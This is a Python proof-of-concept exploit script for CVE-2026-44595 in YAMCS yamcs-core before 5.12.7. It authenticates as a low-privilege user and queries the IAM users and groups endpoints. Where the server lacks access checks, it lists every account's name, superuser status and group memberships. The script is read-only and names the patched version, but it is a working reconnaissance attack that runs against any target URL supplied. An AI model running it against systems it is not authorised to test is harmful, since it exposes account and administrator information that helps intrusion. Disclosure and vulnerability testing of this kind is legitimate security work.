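#!/usr/bin/env python3
# Exploit Title: YAMCS yamcs-core < 5.12.7 - User Enumeration
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44595
# Category: Remote / Information Disclosure
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29
"""
CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
=================================================================
IAM API endpoints (listUsers, getUser, listGroups, getGroup) do not
enforce SystemPrivilege.ControlAccess. Any authenticated user can
enumerate all accounts, superuser status, and group memberships.

Affected endpoints:
  GET /api/iam/users
  GET /api/iam/users/{name}
  GET /api/iam/groups
  GET /api/iam/groups/{name}
=================================================================

Usage:
  python3 <this script> [target] [username] [password]

Defaults are http://localhost:8090, "testuser" and "test". The password
may also be supplied through the YAMCS_PASSWORD environment variable so
that it does not show up in the process list. The check is read-only:
it authenticates once, issues two GETs against the list endpoints, and
reports a 403 as the patched behaviour and a 200 listing as vulnerable.
"""
import json
import os
import sys

import requests

# Upper bound (seconds) on every HTTP call; without it an unresponsive
# host would hang the check indefinitely.
REQUEST_TIMEOUT = 15


def _authenticate(base, username, password):
    """Obtain a bearer token through the password grant.

    Args:
        base: Target URL with any trailing slash removed.
        username: Low-privilege account to authenticate as.
        password: That account's password.

    Returns:
        A dict holding the ``Authorization`` header on success, or ``None``
        after printing the reason (transport error, non-200 status, non-JSON
        body, or a body without ``access_token``).

    The token value itself is deliberately not printed: a live credential
    does not belong in console output or CI logs.
    """
    print("\n[1] Authenticating as low-privilege user...")
    try:
        resp = requests.post(
            f"{base}/auth/token",
            data={"grant_type": "password", "username": username, "password": password},
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as e:
        print(f" [-] Error: {e}")
        return None

    if resp.status_code != 200:
        print(f" [-] Auth failed: HTTP {resp.status_code}")
        print(" [*] Create test user: yamcsadmin users create testuser --password test")
        return None

    try:
        token = resp.json().get("access_token")
    except (ValueError, AttributeError) as e:
        # ValueError covers a non-JSON body; AttributeError a JSON body
        # that is not an object.
        print(f" [-] Unexpected token response: {e}")
        return None
    if not token:
        print(" [-] Auth response did not contain access_token")
        return None

    print(" [+] Token obtained")
    return {"Authorization": f"Bearer {token}"}


def _describe_user(user):
    """Format one user entry: name plus whether the account is a superuser."""
    flag = "SUPERUSER" if user.get("superuser") else "regular"
    return f"{user.get('name')} [{flag}]"


def _describe_group(group):
    """Format one group entry: name plus its member count."""
    return f"{group.get('name')} ({len(group.get('members', []))} members)"


def _check_listing(base, headers, path, key, banner, describe):
    """GET one IAM list endpoint and report whether it was exposed.

    Args:
        base: Target URL with any trailing slash removed.
        headers: Authorization header dict from ``_authenticate``.
        path: Endpoint path, e.g. ``/api/iam/users``.
        key: JSON key under which the server returns the list.
        banner: Line printed before the request is made.
        describe: Callable turning one list item into a display string.

    Returns:
        The list of exposed items when the server answered 200, otherwise
        ``None`` (403 is printed as PATCHED; other statuses, transport
        errors and unparsable bodies are printed and yield ``None``).
    """
    print(banner)
    try:
        resp = requests.get(f"{base}{path}", headers=headers, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        print(f" [-] Error: {e}")
        return None

    print(f" HTTP: {resp.status_code}")
    if resp.status_code == 403:
        # Patched servers enforce ControlAccess and deny the listing.
        print(" [+] 403 Access Denied — PATCHED")
        return None
    if resp.status_code != 200:
        return None

    try:
        payload = resp.json()
    except ValueError:
        print(" [-] Response body was not JSON")
        return None
    items = payload.get(key, []) if isinstance(payload, dict) else []

    print(f"\n [!!!] VULNERABLE — {len(items)} {key} enumerated:")
    for item in items:
        print(f" -> {describe(item)}")
    return items


def main():
    """Parse argv, authenticate, then probe the two IAM list endpoints."""
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
    username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
    # argv is readable by other local users (e.g. via ps); the environment
    # variable is the less leaky way to hand over the password.
    password = sys.argv[3] if len(sys.argv) > 3 else os.environ.get("YAMCS_PASSWORD", "test")
    base = target.rstrip("/")

    print("=" * 65)
    print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
    print(f" Target: {target}")
    print(f" Username: {username} (low-privilege account)")
    print("=" * 65)

    headers = _authenticate(base, username, password)
    if headers is None:
        return

    _check_listing(
        base,
        headers,
        "/api/iam/users",
        "users",
        "\n[2] GET /api/iam/users (requires ControlAccess — not enforced):",
        _describe_user,
    )
    _check_listing(
        base,
        headers,
        "/api/iam/groups",
        "groups",
        "\n[3] GET /api/iam/groups:",
        _describe_group,
    )

    print("\n" + "=" * 65)
    print(" Fix: Upgrade to yamcs-core >= 5.12.7")
    print("=" * 65)


if __name__ == "__main__":
    main()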